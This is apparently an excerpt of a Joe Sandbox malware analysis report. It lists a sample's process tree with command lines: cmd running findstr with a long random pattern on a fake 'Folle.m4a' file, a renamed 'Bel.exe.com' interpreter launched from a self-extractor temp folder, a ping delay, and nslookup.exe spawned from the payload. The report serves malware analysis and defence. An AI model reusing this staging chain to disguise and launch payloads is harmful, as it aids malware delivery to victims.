Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Analysis Process: cmd.exe PID: 6516 Parent PID: 6424

General

Start time: 05:56:28
Start date: 24/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

File Written

File Read

Analysis Process: findstr.exe PID: 6532 Parent PID: 6516

General

Start time: 05:56:28
Start date: 24/06/2021
Path: C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit): true
Commandline: findstr /V /R '^ZHdrmMsYFJiRDNmGpRonwXdHHcnPYBUAWuOMQZMASfNOcQYMlNcHCFhwsJvrhBqrOHUvZMPlyIGLlBkQvMElyhYdTMciCIjdfJZ$' Folle.m4a
Imagebase: 0x1380000
File size: 29696 bytes
MD5 hash: 8B534A7FC0630DE41BB1F98C882C19EC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

File Written

Analysis Process: Bel.exe.com PID: 6552 Parent PID: 6516

General

Start time: 05:56:29
Start date: 24/06/2021
Path: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com
Wow64 process (32bit): true
Commandline: Bel.exe.com R
Imagebase: 0x7ff797770000
File size: 893608 bytes
MD5 hash: C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

File Read

Analysis Process: PING.EXE PID: 6564 Parent PID: 6516

General

Start time: 05:56:29
Start date: 24/06/2021
Path: C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit): true
Commandline: ping 127.0.0.1 -n 30
Imagebase: 0xe30000
File size: 18944 bytes
MD5 hash: 70C24A306F768936563ABDADB9CA9108
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Analysis Process: Bel.exe.com PID: 6600 Parent PID: 6552

General

Start time: 05:56:30
Start date: 24/06/2021
Path: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Bel.exe.com R
Imagebase: 0x10e0000
File size: 893608 bytes
MD5 hash: C56B5F0201A3B3DE53E561FE76912BFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

File Activities

File Deleted

File Read

Analysis Process: nslookup.exe PID: 4532 Parent PID: 6600

General

Start time: 05:58:16
Start date: 24/06/2021
Path: C:\Windows\SysWOW64\nslookup.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\nslookup.exe
Imagebase: 0xc40000
File size: 78336 bytes
MD5 hash: 8E82529D1475D67615ADCB4E1B8F4EEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Registry Activities

Key Created

Key Value Created

Disassembly

Code Analysis

Copyright Joe Security LLC Joe Sandbox Cloud Basic 32.0.0 Black Diamond
